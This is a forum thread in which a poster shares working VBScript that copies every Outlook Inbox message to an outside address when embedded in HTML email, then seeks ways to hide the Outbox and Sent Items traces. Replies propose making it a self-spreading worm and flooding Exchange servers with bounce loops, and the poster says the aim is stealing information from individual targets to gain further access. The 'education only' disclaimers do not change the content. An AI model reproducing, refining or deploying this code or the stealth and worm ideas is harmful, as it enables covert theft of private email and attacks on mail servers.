5 replies to this topic

[agamemnon]

I've just become slightly more interested in the world of VBS email viruses since they seem to have had quite a strong noose around MS Outlook's neck these last years. So, being a DIY guru I decidied to see if I could make my own; one that would be different from all the others...
Well, as i'd never seen a VBS virus that 'stole' your email I set about making one.
(I've never used VBS/WSH before so this was a first, although it is mighty similar to the old QBASIC stuff to which i'm quite accustomed to... ahhh, those were the days!)

So, here she is:

Set appOutlook = CreateObject("Outlook.Application")   'connects to outlook
Set mapiNameSpace = appOutlook.GetNameSpace("MAPI")    'authenticates
Set objInBox = mapiNameSpace.GetDefaultFolder(6)       'gets Inbox

For Each objItem in objInBox.Items                     'iterates though each message
	Set objMail = appOutlook.CreateItem(0)
	objMail.To = "*AN ADDRESS*@somewhere.com"              'sets To:
	objMail.Subject = objItem.Subject                      'copies Subject
	objMail.Body = objItem.Body                            'copies Body
	objMail.Send                                           'sends message
Next

Set objMail = Nothing

Now, this thing works a treat when embedded in an HTML email message sent to MS Outlook (Note: NOT Outlook Express, sorry!). As I explained above, it makes a copy of each message and sends it to *AN ADDRESS*@somewhere.com however, there is at least one major problem. All the code does is line the messages up, ready to be sent, in the Outbox folder. So, if the emails are to be stolen the 'victim' (me!) has to press 'Send And Receive'... at which point he (me!) will see the 45000 messages being sent. To make matters worse, if the victim (...yep, me!) then later checks his 'Sent Items', lo and behold, a log of all the 'stolen' messages glows before his eyes!

Right, so to go about fixing it... Now I could probably interface with 'Sent Items' and make the script autmatically delete them after they've been sent - or perhaps there is a variable that would tell Outlook not to make a 'Sent Items' copy for these few messages?

But the real problem is that when the script is run (secretly) the victim can see 'Outbox (543)' and tell straight away that something is sending emails for him. And of course it wouldn't be difficult at all to find out where they were going...

Please note, that i'm only writing this code to learn some VBS and some of how the language controls Windows' objects. It is not meant to be used for ANY malicious purposes, and I accept no responsibility if it is so abused.

[Stephen]

Well you are partially correct

This thing would be pretty useless if targeted at "home" user

but on the other hand corporate!

Corporate generally has sends set to auto becase Corporate setups running an exhange server

If you were to make this a spreading virii that emailed itself to everyone on an infected users email list

and was able to get someone's email address that has a very big email account and cand except a lot of emails say ehmm Bill gates

This would turn into a very very bad email worm why?

Well lets say person 'A' has been infected and he works at lets say University 'A'

in his contact box is a lot of outside contacts and a lot of (internal contacts exchange server)

Well since every time the worm sends out a email address it gets placed in his sent folder this is taking up room on the exchange server with enough action the exchange server gets bombarded with tons of email hard drives filled up

and bill gates gets a friendly reminder of how much he needs to fix his software


now don't you go getting any ideas

[Stephen]

A more practical application would be to have it send out emails to a non-existent email account

this would cause them to recieve an un deliverable mail message that would again be sent out

With a setup like that and released into the wild at a the correct place you could take out exchange servers quickly before they knew what hit them

someone better start on the patch

[Blake]

Or spoof an e-mail account on a domain and send it to a non existant account on the same domain. Do this a couple hundred time is a loop with different spoofed addys and it will begin to loop on servers that send back failure notices. Causes one heck of a cpu load.

It's a good idea to disable your email server to just drop bad emails and not notify the sender.

[agamemnon]

Sorry, not to sound funny, but the purpose of this thing (at least what I was thinking when I wrote it) is not to wreak havoc on half the planet's email servers; but to be used on individual targets to obtain information about a system (or future target systems) that could become useful in gaining further access.

You are quite right in seeing the far more malicious potential of this script, however there are some issues that would need to be looked at if it were ever to become effective.

1) The program needs to operate silently (which at present it partially does). The "Send and Receive" function would have to be automated within the code so that the target has no idea that all his emails have been 'stolen'.

2) The script would only be effective on broadband targets or at least ones that are "dialed-up" all the time as the messages would sit in the Outbox - easily noticed.

3) And to be fair, the script does not run entirely by itself, the user must authorise the ActiveX script to run. Of course, it won't run if Active Scripting is disabled.

Thus: The delivery of the script is flawed as most users will not alow it to run; the script itself is flawed as it fails to run silently and is almost 'eager' to alert the user of its presence!

Never mind! - It was fun learning some VBScript. Maybe we'd like to try and make this thing better? ... Or not! - No matter which, i'm still interested in it's possibilites and the further exploration of email theft.

(Again, my code is not to be used for malicious purposes and is for education only! - I accept no responsibility for what is done with it) -- Still paranoid!